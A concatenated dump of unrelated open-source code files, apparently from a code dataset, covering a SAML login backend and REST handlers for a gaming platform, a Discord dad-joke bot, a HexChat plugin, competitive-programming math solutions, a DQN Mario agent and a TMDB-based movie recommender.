return HttpResponseServerError(content=', '.join(errors))
"""
config = self.generate_saml_config()
saml_settings = OneLogin_Saml2_Settings(
config,
sp_validation_only=True
)
metadata = saml_settings.get_sp_metadata()
errors = saml_settings.validate_metadata(metadata)
return metadata, errors
def _create_saml_auth(self, idp):
"""Get an instance of OneLogin_Saml2_Auth"""
config = self.generate_saml_config(idp)
request_info = {
'https': 'on' if self.strategy.request_is_secure() else 'off',
'http_host': self.strategy.request_host(),
'script_name': self.strategy.request_path(),
'server_port': self.strategy.request_port(),
'get_data': self.strategy.request_get(),
'post_data': self.strategy.request_post(),
}
return OneLogin_Saml2_Auth(request_info, config)
def auth_url(self):
"""Get the URL to which we must redirect in order to
authenticate the user"""
try:
idp_name = self.strategy.request_data()['idp']
except KeyError:
raise AuthMissingParameter(self, 'idp')
auth = self._create_saml_auth(idp=self.get_idp(idp_name))
# Below, return_to sets the RelayState, which can contain
# arbitrary data. We use it to store the specific SAML IdP
# name, since we multiple IdPs share the same auth_complete
# URL.
return auth.login(return_to=idp_name)
def get_user_details(self, response):
"""Get user details like full name, email, etc. from the
response - see auth_complete"""
idp = self.get_idp(response['idp_name'])
return idp.get_user_details(response['attributes'])
def get_user_id(self, details, response):
"""
Get the permanent ID for this user from the response.
We prefix each ID with the name of the IdP so that we can
connect multiple IdPs to this user.
"""
idp = self.get_idp(response['idp_name'])
uid = idp.get_user_permanent_id(response['attributes'])
return '{0}:{1}'.format(idp.name, uid)
def auth_complete(self, *args, **kwargs):
"""
The user has been redirected back from the IdP and we should
now log them in, if everything checks out.
"""
idp_name = self.strategy.request_data()['RelayState']
idp = self.get_idp(idp_name)
auth = self._create_saml_auth(idp)
auth.process_response()
errors = auth.get_errors()
if errors or not auth.is_authenticated():
reason = auth.get_last_error_reason()
raise AuthFailed(
self, 'SAML login failed: {0} ({1})'.format(errors, reason)
)
attributes = auth.get_attributes()
attributes['name_id'] = auth.get_nameid()
self._check_entitlements(idp, attributes)
response = {
'idp_name': idp_name,
'attributes': attributes,
'session_index': auth.get_session_index(),
}
kwargs.update({'response': response, 'backend': self})
return self.strategy.authenticate(*args, **kwargs)
def extra_data(self, user, uid, response, details=None, *args, **kwargs):
return super(SAMLAuth, self).extra_data(user, uid,
response['attributes'],
details=details,
*args, **kwargs)
def _check_entitlements(self, idp, attributes):
"""
Additional verification of a SAML response before
authenticating the user.
Subclasses can override this method if they need custom
validation code, such as requiring the presence of an
eduPersonEntitlement.
raise anthill.framework.auth.social.core.exceptions.AuthForbidden
if the user should not be authenticated, or do nothing
to allow the login pipeline to continue.
"""
pass
```
#### File: rest/handlers/detail.py
```python
from anthill.framework.handlers import RequestHandler, JSONHandlerMixin
from anthill.framework.utils.asynchronous import thread_pool_exec
from anthill.framework.core.exceptions import ImproperlyConfigured
from anthill.framework.http import Http404
from anthill.platform.api.rest.handlers.base import MarshmallowMixin
class SingleObjectMixin:
"""
Provide the ability to retrieve a single object for further manipulation.
"""
model = None
queryset = None
slug_field = 'slug'
slug_url_kwarg = 'slug'
pk_url_kwarg = 'pk'
query_pk_and_slug = False
async def get_object(self, queryset=None):
"""
Return the object the handler is displaying.
Require `self.queryset` and a `pk` or `slug` argument in the url entry.
Subclasses can override this to return any object.
"""
# Use a custom queryset if provided.
if queryset is None:
queryset = self.get_queryset()
# Next, try looking up by primary key.
pk = self.path_kwargs.get(self.pk_url_kwarg)
slug = self.path_kwargs.get(self.slug_url_kwarg)
if pk is not None:
queryset = await thread_pool_exec(queryset.filter_by, pk=pk)
# Next, try looking up by slug.
if slug is not None and (pk is None or self.query_pk_and_slug):
slug_field = self.get_slug_field()
queryset = await thread_pool_exec(queryset.filter_by, **{slug_field: slug})
# If none of those are defined, it's an error.
if pk is None and slug is None:
raise AttributeError(
"Generic detail handler %s must be called with either an object "
"pk or a slug in the url." % self.__class__.__name__)
# Get the single item from the filtered queryset
obj = await thread_pool_exec(queryset.one_or_none)
if obj is None:
raise Http404
return obj
def get_queryset(self):
"""
Return the queryset that will be used to look up the object.
This method is called by the default implementation of get_object() and
may not be called if get_object() is overridden.
"""
if self.queryset is None:
if self.model:
return self.model.query
else:
raise ImproperlyConfigured(
"%(cls)s is missing a queryset. Define "
"%(cls)s.model, %(cls)s.queryset, or override "
"%(cls)s.get_queryset()." % {
'cls': self.__class__.__name__
}
)
return self.queryset
def get_slug_field(self):
"""Get the name of a slug field to be used to look up by slug."""
return self.slug_field
class MarshmallowSingleObjectMixin(MarshmallowMixin):
def get_schema(self):
schema_class = self.get_schema_class()
return schema_class()
def get_schema_class(self):
if self.schema_class is None:
try:
return self.object.__marshmallow__
except AttributeError:
raise ImproperlyConfigured(
"No schema class for dumping data. Either provide a schema_class "
"or define schema on the Model.")
return super().get_schema_class()
class DetailMixin(SingleObjectMixin, MarshmallowSingleObjectMixin, JSONHandlerMixin):
def get_schema_class(self):
if self.schema_class is None:
try:
return self.object.__marshmallow__
except AttributeError:
raise ImproperlyConfigured(
"No schema class for dumping data. Either provide a schema_class "
"or define schema on the Model.")
return self.schema_class
async def get(self, *args, **kwargs):
# noinspection PyAttributeOutsideInit
self.object = await self.get_object()
self.write_json(data=self.serialize(self.object))
class DetailHandler(DetailMixin, RequestHandler):
pass
```
#### File: rest/handlers/list.py
```python
from anthill.platform.api.rest.handlers.base import MarshmallowMixin
from anthill.framework.handlers.base import RequestHandler
from anthill.framework.core.paginator import Paginator
class MultipleObjectMixin:
"""A mixin for handlers manipulating multiple objects."""
allow_empty = True
queryset = None
model = None
paginate_by = None
paginate_orphans = 0
context_object_name = None
paginator_class = Paginator
page_kwarg = 'page'
ordering = None
class MarshmallowMultipleObjectsMixin(MarshmallowMixin):
def get_schema(self):
schema_class = self.get_schema_class()
return schema_class(many=True)
def get_schema_class(self):
if self.schema_class is None:
# TODO
pass
return super().get_schema_class()
class ListMixin(MultipleObjectMixin, MarshmallowMultipleObjectsMixin):
pass
class ListHandler(ListMixin, RequestHandler):
"""A handler for displaying a list of objects."""
```
#### File: platform/atomic/models.py
```python
from anthill.framework.db import db
from anthill.framework.utils import timezone
from anthill.framework.utils.translation import translate_lazy as _
from anthill.platform.atomic.exceptions import (
TransactionError, TransactionTimeoutError, TransactionFinished)
from sqlalchemy_utils.types.uuid import UUIDType
from sqlalchemy_utils.types.choice import ChoiceType
import logging
logger = logging.getLogger('anthill.application')
class Transaction(db.Model):
__tablename__ = 'transactions'
STATUSES = (
('new', _('New')),
('started', _('Started')),
('successful', _('Successful')),
('failed', _('Failed')),
)
id = db.Column(UUIDType(binary=False), primary_key=True)
started = db.Column(db.DateTime, nullable=False, default=timezone.now)
finished = db.Column(db.DateTime)
status = db.Column(ChoiceType(STATUSES), nullable=False, default='new')
timeout = db.Column(db.Integer, nullable=False, default=0)
master = db.Column(db.String(128)) # Name of master service
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._steps = []
self._steps_iterator = None
@property
def is_finished(self):
return self.finished is not None
def check_for_timeout(self):
if not self.is_finished and 0 < self.timeout < timezone.now() - self.started:
raise TransactionTimeoutError
def append(self, step, *args, **kwargs):
self._steps.append([step, args, kwargs])
self._steps_iterator = iter(self.steps)
async def start(self):
try:
func, args, kwargs = self._steps_iterator.__next__()
return await func(*args, **kwargs)
except StopIteration:
raise TransactionFinished
```
#### File: platform/handlers/base.py
```python
class InternalRequestHandlerMixin:
@property
def internal_request(self):
"""
An alias for `self.application.internal_connection.request
<InternalConnection.request>`.
"""
return self.application.internal_connection.request
```
#### File: anthill/platform/models.py
```python
from anthill.framework.db import db
from sqlalchemy.ext.declarative import declared_attr
class BaseApplication(db.Model):
__abstract__ = True
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
active = db.Column(db.Boolean, nullable=False, default=True)
name = db.Column(db.String(128), nullable=False, unique=True)
@declared_attr
def versions(self):
return db.relationship('ApplicationVersion', backref='application', lazy='dynamic')
@classmethod
def latest_version(cls):
pass
class BaseApplicationVersion(db.Model):
__abstract__ = True
__table_args__ = (
db.UniqueConstraint('value', 'application_id'),
)
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
active = db.Column(db.Boolean, nullable=False, default=True)
value = db.Column(db.String(128), nullable=False)
@declared_attr
def application_id(self):
return db.Column(db.Integer, db.ForeignKey('applications.id'), nullable=False)
@classmethod
def latest(cls):
pass
def __lt__(self, other):
return self.value < other.value
```
#### File: api/v1/public.py
```python
from graphene_sqlalchemy import SQLAlchemyObjectType
from tornado.httpclient import AsyncHTTPClient
from tornado.escape import to_unicode
from anthill.framework.apps import app
from apigw import models
import graphene
import json
class RootQuery(graphene.ObjectType):
"""Api root query."""
request = graphene.JSONString(
service_name=graphene.String(default_value=app.label),
query=graphene.String()
)
@staticmethod
async def resolve_request(root, info, service_name, query):
handler = info.context['handler']
try:
metadata = next(filter(
lambda x: x['name'] == service_name, handler.settings['services_meta']))
except StopIteration:
return {}
else:
data = await AsyncHTTPClient().fetch(
metadata['public_api_url'],
method=handler.request.method,
body=json.dumps({'query': query}),
headers=handler.request.headers
)
return json.loads(to_unicode(data.body))
# noinspection PyTypeChecker
schema = graphene.Schema(query=RootQuery)
```
#### File: anthill_gaming/backup/models.py
```python
from anthill.framework.db import db
from anthill.framework.utils import timezone
from anthill.platform.api.internal import InternalAPIMixin
from sqlalchemy_utils.types import ColorType
class Backup(db.Model):
__tablename__ = 'backups'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
created = db.Column(db.DateTime, default=timezone.now)
group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))
recoveries = db.relationship('Recovery', backref='backup', lazy='dynamic')
# TODO: file
class Group(db.Model):
__tablename__ = 'groups'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
active = db.Column(db.Boolean, nullable=False, default=True)
backups = db.relationship('Backup', backref='group', lazy='dynamic')
recoveries = db.relationship('Recovery', backref='group', lazy='dynamic') # TODO: ?
color = db.Column(ColorType)
class Recovery(InternalAPIMixin, db.Model):
__tablename__ = 'recoveries'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
created = db.Column(db.DateTime, default=timezone.now)
group_id = db.Column(db.Integer, db.ForeignKey('groups.id')) # TODO: ?
backup_id = db.Column(db.Integer, db.ForeignKey('backups.id'))
author_id = db.Column(db.Integer, nullable=False)
# TODO:
async def get_author(self):
return await self.internal_request('login', 'get_user', user_id=self.author_id)
```
#### File: anthill_gaming/game_controller/services.py
```python
from anthill.platform.services import PlainService, ControllerRole
from anthill.platform.api.internal import as_internal
class Service(ControllerRole, PlainService):
"""Anthill default service."""
master = 'game_master'
@staticmethod
def setup_internal_api():
@as_internal()
async def heartbeat_report(api, **options):
# TODO:
pass
```
#### File: anthill_gaming/game_master/models.py
```python
from anthill.framework.db import db
from anthill.framework.utils import timezone
from anthill.framework.utils.asynchronous import as_future, thread_pool_exec as future_exec
from anthill.framework.utils.translation import translate_lazy as _
from anthill.platform.models import BaseApplication, BaseApplicationVersion
from anthill.platform.api.internal import InternalAPIMixin, RequestError
from anthill.platform.auth import RemoteUser
from anthill.platform.services import HeartbeatReport
from sqlalchemy_utils.types import URLType, ChoiceType, JSONType
from sqlalchemy.ext.hybrid import hybrid_property
from geoalchemy2.elements import WKTElement
from geoalchemy2 import Geometry
from typing import Union
import geoalchemy2.functions as func
import traceback
import json
class PlayersLimitPerRoomExceeded(Exception):
pass
class UserBannedError(Exception):
pass
class Application(BaseApplication):
__tablename__ = 'applications'
class ApplicationVersion(BaseApplicationVersion):
__tablename__ = 'application_versions'
rooms = db.relationship('Room', backref='app_version', lazy='dynamic')
class Room(InternalAPIMixin, db.Model):
__tablename__ = 'rooms'
id = db.Column(db.Integer, primary_key=True)
server_id = db.Column(db.Integer, db.ForeignKey('servers.id'))
app_version_id = db.Column(db.Integer, db.ForeignKey('application_versions.id'))
players = db.relationship('Player', backref='room', lazy='dynamic')
settings = db.Column(JSONType, nullable=False, default={})
max_players_count = db.Column(db.Integer, nullable=False, default=0)
async def check_moderations(self):
# TODO: get moderations from moderation servce
if True:
raise UserBannedError
async def join(self, player):
players = await future_exec(self.players.all)
if len(players) >= self.max_players_count:
raise PlayersLimitPerRoomExceeded
await self.check_moderations()
player.room_id = self.id
await future_exec(self.players.append, player)
# TODO: make other players to know about new player
player_data1 = {}
for p in players:
await RemoteUser.send_message_by_user_id(
p.id, message=json.dumps(player_data1), content_type='application/json')
# TODO: send some info to the new player
player_data2 = {}
await RemoteUser.send_message_by_user_id(
player.user_id, message=json.dumps(player_data2), content_type='application/json')
class Player(InternalAPIMixin, db.Model):
__tablename__ = 'players'
id = db.Column(db.Integer, primary_key=True)
user_id = db.Column(db.Integer, nullable=False)
room_id = db.Column(db.Integer, db.ForeignKey('rooms.id'))
payload = db.Column(JSONType, nullable=False, default={})
async def get_user(self) -> RemoteUser:
data = await self.internal_request('login', 'get_user', user_id=self.user_id)
return RemoteUser(**data)
class GeoLocationRegion(db.Model):
__tablename__ = 'geo_location_regions'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
locations = db.relationship('GeoLocation', backref='region', lazy='dynamic')
class GeoLocation(db.Model):
__tablename__ = 'geo_locations'
id = db.Column(db.Integer, primary_key=True)
point = db.Column(Geometry(geometry_type='POINT', srid=4326))
region_id = db.Column(db.Integer, db.ForeignKey('geo_location_regions.id'))
servers = db.relationship('Server', backref='geo_location', lazy='dynamic')
default = db.Column(db.Boolean, nullable=False, default=False)
@classmethod
def get_nearest(cls, lat, lon):
"""
Find the nearest point to the input coordinates.
Convert the input coordinates to a WKT point and query for nearest point.
"""
pt = WKTElement('POINT({0} {1})'.format(lon, lat), srid=4326)
return cls.query.order_by(cls.point.distance_box(pt)).first()
@staticmethod
def from_point_to_xy(pt):
"""Extract x and y coordinates from a point geometry."""
# noinspection PyUnresolvedReferences
point_json = json.loads(db.session.scalar(func.ST_AsGeoJSON(pt.point)))
return point_json['coordinates']
class Server(InternalAPIMixin, db.Model):
__tablename__ = 'servers'
STATUSES = [
('active', _('Active')),
('failed', _('Failed')),
('overload', _('Overload')),
]
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
location = db.Column(URLType, nullable=False, unique=True)
geo_location_id = db.Column(db.Integer, db.ForeignKey('geo_locations.id'))
last_heartbeat = db.Column(db.DateTime)
status = db.Column(ChoiceType(STATUSES))
last_failure_tb = db.Column(db.Text)
enabled = db.Column(db.Boolean, nullable=False, default=True)
rooms = db.relationship('Room', backref='server', lazy='dynamic')
system_load = db.Column(db.Float, nullable=False, default=0.0)
ram_usage = db.Column(db.Float, nullable=False, default=0.0)
@hybrid_property
def active(self):
return self.enabled and self.status == 'active'
@as_future
def heartbeat(self, report: Union[HeartbeatReport, RequestError]):
if isinstance(report, RequestError):
self.status = 'failed'
self.last_failure_tb = traceback.format_tb(report.__traceback__)
elif isinstance(report, HeartbeatReport):
self.last_heartbeat = timezone.now()
self.system_load = report.system_load
self.ram_usage = report.ram_usage
self.status = 'overload' if report.server_is_overload() else 'active'
else:
raise ValueError('`report` argument should be either instance of'
'HeartbeatReport or RequestError class')
self.save()
class Deployment(db.Model):
__tablename__ = 'deployment'
id = db.Column(db.Integer, primary_key=True)
class Party(db.Model):
__tablename__ = 'parties'
id = db.Column(db.Integer, primary_key=True)
``` |
{
"source": "0x5c/dadbot2k",
"score": 3
} |
#### File: 0x5c/dadbot2k/main.py
```python
import json
import random
import re
from pathlib import Path
from typing import Optional
import discord
from discord.ext import commands
import data.keys as keys
import data.options as opt
intents = discord.Intents.none()
intents.guilds = True
intents.messages = True
bot = commands.Bot(
command_prefix=opt.command_prefix,
case_insensitive=True,
help_command=None,
allowed_mentions=discord.AllowedMentions().none(),
member_cache_flags=discord.MemberCacheFlags().none(),
intents=intents
)
class ChanceManager:
def __init__(self, path: Path):
self._path = path / "risk.json"
self._chance: dict[Optional[int], float] = {}
self.__load()
def __load(self):
chancefile = self._path
if not chancefile.exists():
with chancefile.open("w") as file:
json.dump({}, file)
self._chance = {}
return
with chancefile.open("r") as file:
self._chance = json.load(file)
def __dump(self):
with self._path.open("w") as file:
json.dump(self._chance, file)
def get(self, guild: Optional[int]) -> float:
if not guild:
return opt.default_chance
return self._chance.get(guild, opt.default_chance)
def set(self, guild: int, value: float):
if not (0 <= value <= 1):
raise ValueError("Chance must be a value between 0 and 1")
self._chance[guild] = value
self.__dump()
joke_chance = ChanceManager(Path(opt.chance_dir))
joke_prefix = r"(?:i(?:['`´]| a)?|a)m "
@bot.command()
@commands.check_any(commands.has_permissions(administrator=True), commands.is_owner())
@commands.guild_only()
async def chance(ctx: commands.Context, risk: Optional[float]):
"""Sets or display the dadjoking risk."""
gid = ctx.guild.id
if risk is None:
await ctx.send(f"ℹ️ Current risk of dadjoking is `~{joke_chance.get(gid):.2%}`.")
return
try:
joke_chance.set(gid, risk)
await ctx.send(f"✅ Successfully set the new dadjoking risk to `~{risk:.2%}`.")
except ValueError as e:
await ctx.send(f"⚠️ **Error!** {e}.")
@bot.event
async def on_message(msg: discord.Message):
if msg.author.bot:
return
guild = msg.guild
nick, gid = (guild.me.nick, guild.id) if guild else (None, None)
if (m := re.match(joke_prefix, msg.content, flags=re.I)) and random.random() <= joke_chance.get(gid):
dadname = nick if nick else "Dad!"
victim_name = msg.content.removeprefix(m.group(0))
await msg.channel.send(f"Hi {victim_name}, I'm {dadname}")
if guild:
print(f"* Gottem! in {guild} [{guild.id}]")
else:
print(f"* Gottem in DMs??? {msg.channel} [{msg.channel.id}]")
await bot.process_commands(msg)
@bot.event
async def on_ready():
print(f"> We are {bot.user} {bot.user.id}")
try:
bot.run(keys.discord_token)
except discord.LoginFailure as ex:
# Miscellaneous authentications errors: borked token and co
raise SystemExit("Error: Failed to authenticate: {}".format(ex))
except discord.ConnectionClosed as ex:
# When the connection to the gateway (websocket) is closed
raise SystemExit("Error: Discord gateway connection closed: [Code {}] {}".format(ex.code, ex.reason))
except ConnectionResetError as ex:
# More generic connection reset error
raise SystemExit("ConnectionResetError: {}".format(ex))
# --- Exit ---
# Codes for the wrapper shell script:
# 0 - Clean exit, don't restart
# 1 - Error exit, [restarting is up to the shell script]
# 42 - Clean exit, do restart
raise SystemExit(0)
``` |
{
"source": "0x5c/hexchat-void-repos",
"score": 2
} |
#### File: 0x5c/hexchat-void-repos/void_repos.py
```python
import hexchat
__module_name__ = "void-repos"
__module_version__ = "1.0.0"
__module_description__ = "Plugin for Voidlinux's git repositories"
debug = False
def handle_robot(word: list[str], word_eol: list[str], userdata):
if hexchat.get_info("server").endswith(".libera.chat"):
if hexchat.get_info("channel") == "#xbps":
if word[0] == "void-robot":
event, title, url = parse_robot(word[2])
hexchat.prnt(f"\00311Void\00310Robot\t\x0f{event}")
hexchat.prnt(f"\00310{title}")
if url:
hexchat.prnt(f"\00314{url}")
return hexchat.EAT_HEXCHAT
return hexchat.EAT_NONE
if debug:
def robot_test(word: list[str], word_eol: list[str], userdata):
event, title, url = parse_robot(word_eol[1])
hexchat.prnt(f"\00311Void\00310Robot\t\x0f{event}")
hexchat.prnt(f"\00310{title}")
if url:
hexchat.prnt(f"\00314{url}")
return hexchat.EAT_ALL
hexchat.hook_command("robotest", robot_test)
hexchat.hook_print("Channel Notice", handle_robot, priority=hexchat.PRI_HIGH)
hexchat.prnt("\00311Void\00310Repos\tPlugin loaded!")
# Test strings
# PR:
# steinex opened #34796 [void-packages] (cozy: update to 1.1.3, adopt)
# Push:
# Hoshpak pushed to void-packages (linux4.19: update to 4.19.223.)
def parse_robot(msg: str) -> tuple[str, str, str]:
user, msg = msg.split(" ", 1)
if msg.startswith(("opened", "closed")):
action, msg = msg.split(" ", 1)
if action == "opened":
action = "\00303" + action
else:
action = "\00305" + action
number, msg = msg.split(" ", 1)
number = number.removeprefix("#")
repo, msg = msg.split(" ", 1)
repo = repo.removeprefix("[").removesuffix("]")
title = msg.removeprefix("(").removesuffix(")")
return (f"\00312{user} {action} \00313#{number} \00311in \00312{repo}",
title,
f"https://github.com/void-linux/{repo}/pull/{number}")
if msg.startswith("pushed"):
msg = msg.removeprefix("pushed to ")
repo, msg = msg.split(" ", 1)
title = msg.removeprefix("(").removesuffix(")")
return (f"\00312{user} \00307pushed \00311to \00312{repo}",
title, "")
``` |
{
"source": "0x5eba/CSES-solutions",
"score": 3
} |
#### File: Mathematics/Exponentiation2/s.py
```python
def totient(n): # n - unsigned int
result = 1
p = 2 # prime numbers - 'iterator'
while p**2 <= n:
if(n % p == 0): # * (p-1)
result *= (p-1)
n //= p
while(n % p == 0): # * p^(k-1)
result *= p
n //= p
p += 1
if n != 1:
result *= (n-1)
return result # in O(sqrt(n))
def modpow(p, z, b, c, m): # (p^z)^(b^c) mod m
cp = 0
while m % p == 0:
cp += 1
m //= p # m = m' now
t = totient(m)
exponent = ((pow(b, c, t)*z) % t + t - (cp % t)) % t
# exponent = z*(b^c)-cp mod t
return pow(p, cp) * pow(p, exponent, m)
def solve(a, b, c, m): # split and solve
result = 1
p = 2 # primes
while p**2 <= a:
z = 0
while a % p == 0: # calculate z
a //= p
z += 1
if z != 0:
result *= modpow(p, z, b, c, m)
result %= m
p += 1
if a != 1: # Possible last prime
result *= modpow(a, 1, b, c, m)
return result % m
N = int(input())
while(N > 0):
a, b, c = input().split(' ')
a = int(a)
b = int(b)
c = int(c)
print(solve(a, b, c, 1000000007))
N -= 1
``` |
{
"source": "0x5eba/Dueling-DQN-SuperMarioBros",
"score": 4
} |
#### File: agent/model/losses.py
```python
from keras import backend as K
def huber_loss(y, y_pred, delta: float=1.0):
"""
Return the Huber loss between tensors.
Reference:
https://en.wikipedia.org/wiki/Huber_loss
https://web.stanford.edu/class/cs20si/2017/lectures/slides_03.pdf
https://keras.io/backend/
Args:
y: ground truth y labels
y_pred: predicted y labels
delta: the separating constant between MSE and MAE
Returns:
a scalar loss between the ground truth and predicted labels
"""
# calculate the residuals
residual = K.abs(y_pred - y)
# determine the result of the logical comparison to delta
condition = K.less_equal(residual, delta)
# calculate the two possible returns (MSE and MAE)
then_this = 0.5 * K.square(residual)
else_this = delta * residual - 0.5 * K.square(delta)
# use the condition to determine the resulting tensor
return K.switch(condition, then_this, else_this)
```
#### File: Dueling-DQN-SuperMarioBros/environment/frame_stack_env.py
```python
from collections import deque
import numpy as np
import gym
class FrameStackEnv(gym.Wrapper):
"""An environment wrapper to stack observations into a tensor."""
def __init__(self, env, k):
""" Stack k last frames.
Returns lazy array, which is much more memory efficient.
"""
gym.Wrapper.__init__(self, env)
self.k = k
self.frames = deque([], maxlen=k)
shp = env.observation_space.shape
self.observation_space = gym.spaces.Box(
low=0,
high=255,
shape=(shp[0], shp[1], shp[2] * k),
dtype=np.uint8
)
def reset(self):
ob = self.env.reset()
for _ in range(self.k):
self.frames.append(ob)
return self._get_ob()
def step(self, action):
ob, reward, done, info = self.env.step(action)
self.frames.append(ob)
return self._get_ob(), reward, done, info
def _get_ob(self):
assert len(self.frames) == self.k
return LazyFrames(list(self.frames))
class LazyFrames(object):
"""A memory efficient buffer for frame tensors."""
def __init__(self, frames):
"""
This object ensures that common frames between the observations are
only stored once. It exists purely to optimize memory usage which can
be huge for DQN's 1M frames replay buffers. This object should only be
converted to numpy array before being passed to the model. You'd not
believe how complex the previous solution was.
"""
self._frames = frames
self._out = None
def _force(self):
if self._out is None:
self._out = np.concatenate(self._frames, axis=2)
self._frames = None
return self._out
def __array__(self, dtype=None):
out = self._force()
if dtype is not None:
out = out.astype(dtype)
return out
def __len__(self):
return len(self._force())
def __getitem__(self, i):
return self._force()[i]
```
#### File: Dueling-DQN-SuperMarioBros/environment/reward.py
```python
import gym
import numpy as np
class RewardChace(gym.Wrapper):
"""a wrapper that caches rewards of episodes."""
def __init__(self, env) -> None:
"""
Initialize a reward caching environment.
Args:
env: the environment to wrap
"""
gym.Wrapper.__init__(self, env)
self._score = 0
self.env.unwrapped.episode_rewards = []
def step(self, action):
state, reward, done, info = self.env.step(action)
self._score += reward
if done:
self.env.unwrapped.episode_rewards.append(self._score)
self._score = 0
return state, reward, done, info
def reset(self, **kwargs):
return self.env.reset(**kwargs)
class ClipRewardEnv(gym.RewardWrapper):
"""An environment that clips rewards in {-1, 0, 1}."""
def __init__(self, env):
"""Initialize a new reward clipping environment."""
gym.RewardWrapper.__init__(self, env)
def reward(self, reward):
"""Bin reward to {-1, 0, +1} using its sign."""
return np.sign(reward)
``` |
{
"source": "0x5eba/RecommendationBot",
"score": 2
} |
#### File: 0x5eba/RecommendationBot/movies_cinema_imdb.py
```python
from bs4 import BeautifulSoup
import requests
import pandas as pd
import numpy as np
import csv
import tmdbsimple as tmdb
import time
import numpy as np
import datetime
import copy
from unidecode import unidecode
import calendar
from ast import literal_eval
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.metrics.pairwise import linear_kernel, cosine_similarity
from nltk.stem.snowball import SnowballStemmer
from nltk.stem.wordnet import WordNetLemmatizer
from nltk.corpus import wordnet
from surprise import Reader, Dataset, SVD, evaluate
# import sys
# from importlib import reload
# reload(sys)
# sys.setdefaultencoding('utf8')
tmdb.API_KEY = 'API_KEY'
path_src = '../the-movies-dataset/'
path_dest = '../cinema-dataset/'
final_list_recent_movies = []
def get_tmdb_info(title, original_year):
search = tmdb.Search()
response = search.movie(query=str(title))
for res in search.results:
year = res['release_date'].split('-')[0]
if str(year) == str(original_year):
print(title)
m = tmdb.Movies(res['id'])
credits = m.credits()
keywords = m.keywords()
overview = ''.join([i if ord(i) < 128 else '~' for i in res['overview']])
cast = ''.join([i if ord(i) < 128 else '~' for i in str(credits['cast'][:5])])
crew = ''.join([i if ord(i) < 128 else '~' for i in str(credits['crew'][:5])])
title = ''.join([i if ord(i) < 128 else '~' for i in res['title']])
year = str(res['release_date']).split('-')[0]
res = m.info()
film = {'auseless':0, 'budget':res['budget'], 'genres':res['genres'], 'id': res['id'], 'imdb_id': res['imdb_id'],
'overview':overview, 'popularity':res['popularity'], 'poster_path':res['poster_path'], 'revenue':res['revenue'],
'runtime':res['runtime'],'title':title, 'vote_average':res['vote_average'],
'vote_count':res['vote_count'], 'year':year}
links_csv = pd.read_csv(path_dest + 'links.csv')
id_already_done = links_csv['tmdbId'].values
for i in id_already_done:
if int(str(res['id'])) == int(i):
print("already in links")
return title
last_row_links = links_csv.tail(1)
free_movieId = int(last_row_links['movieId'].values)+1
with open(path_dest + 'metadata.csv', 'a') as csvfile:
fieldnames = list(film.keys())
fieldnames.sort()
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow(film)
with open(path_dest + 'credits.csv', 'a') as csvfile:
fieldnames = ['useless', 'cast','crew','id']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow({'useless':0, 'cast':cast, 'crew':crew, 'id':res['id']})
with open(path_dest + 'keywords.csv', 'a') as csvfile:
fieldnames = ['useless', 'id', 'keywords']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow({'useless':0, 'id':res['id'], 'keywords':keywords['keywords']})
with open(path_dest + 'links.csv', 'a') as csvfile:
fieldnames = ['useless', 'movieId', 'imdbId', 'tmdbId']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writerow({'useless':0, 'movieId':free_movieId, 'imdbId':str(res['imdb_id'])[2:], 'tmdbId':str(res['id'])+'.0'})
print("done")
time.sleep(1)
return title
global_md, global_links, global_credits, global_keywords, global_cosine_sim, global_inverse_indices, global_indices_map, global_indices_map_for_tmdb, global_smd = None, None, None, None, None, None, None, None, None
def get_global_md():
return global_md
def get_global_links():
return global_links
def get_global_credits():
return global_credits
def get_global_keywords():
return global_keywords
def get_global_cosine_sim():
return global_cosine_sim
def get_global_inverse_indices():
return global_inverse_indices
def get_global_indices_map():
return global_indices_map
def get_global_indices_map_for_tmdb():
return global_indices_map_for_tmdb
def get_global_smd():
return global_smd
def load_everything():
md = pd.read_csv(path_dest + 'metadata.csv')
links = pd.read_csv(path_dest + 'links.csv')
credits = pd.read_csv(path_dest + 'credits.csv')
keywords = pd.read_csv(path_dest + 'keywords.csv')
del md['useless']
del links['useless']
del credits['useless']
del keywords['useless']
md['genres'] = md['genres'].fillna('[]').apply(literal_eval).apply(lambda x: [i['name'] for i in x] if isinstance(x, list) else [])
md['popularity'] = md['popularity'].fillna('[]').apply(lambda x: [str(int(x))] if isinstance(x, float) or isinstance(x, int) else [])
links = links[links['tmdbId'].notnull()]['tmdbId'].astype('int')
md['id'] = md['id'].astype('int')
smd = md[md['id'].isin(links)]
keywords['id'] = keywords['id'].astype('int')
credits['id'] = credits['id'].astype('int')
md['id'] = md['id'].astype('int')
md = md.merge(credits, on='id')
md = md.merge(keywords, on='id')
smd = md[md['id'].isin(links)]
smd['cast'] = smd['cast'].apply(literal_eval)
smd['crew'] = smd['crew'].apply(literal_eval)
smd['keywords'] = smd['keywords'].apply(literal_eval)
def get_director(x):
for i in x:
if i['job'] == 'Director':
return i['name']
return np.nan
indices = pd.Series(smd.index, index=smd['title'])
smd['keywords'] = smd['keywords'].apply(lambda x: [i['name'] for i in x] if isinstance(x, list) else [])
smd['cast'] = smd['cast'].apply(lambda x: [i['name'] for i in x] if isinstance(x, list) else [])
smd['cast'] = smd['cast'].apply(lambda x: x[:3] if len(x) >=3 else x)
smd['cast'] = smd['cast'].apply(lambda x: [str.lower(i.replace(" ", "")) for i in x])
smd['director'] = smd['crew'].apply(get_director)
smd['director'] = smd['director'].astype('str').apply(lambda x: str.lower(x.replace(" ", "")))
smd['director'] = smd['director'].apply(lambda x: [x,x,x])
s = smd.apply(lambda x: pd.Series(x['keywords']),axis=1).stack().reset_index(level=1, drop=True)
s.name = 'keyword'
s = s.value_counts()
s = s[s > 1]
stemmer = SnowballStemmer('english')
stemmer.stem('dogs')
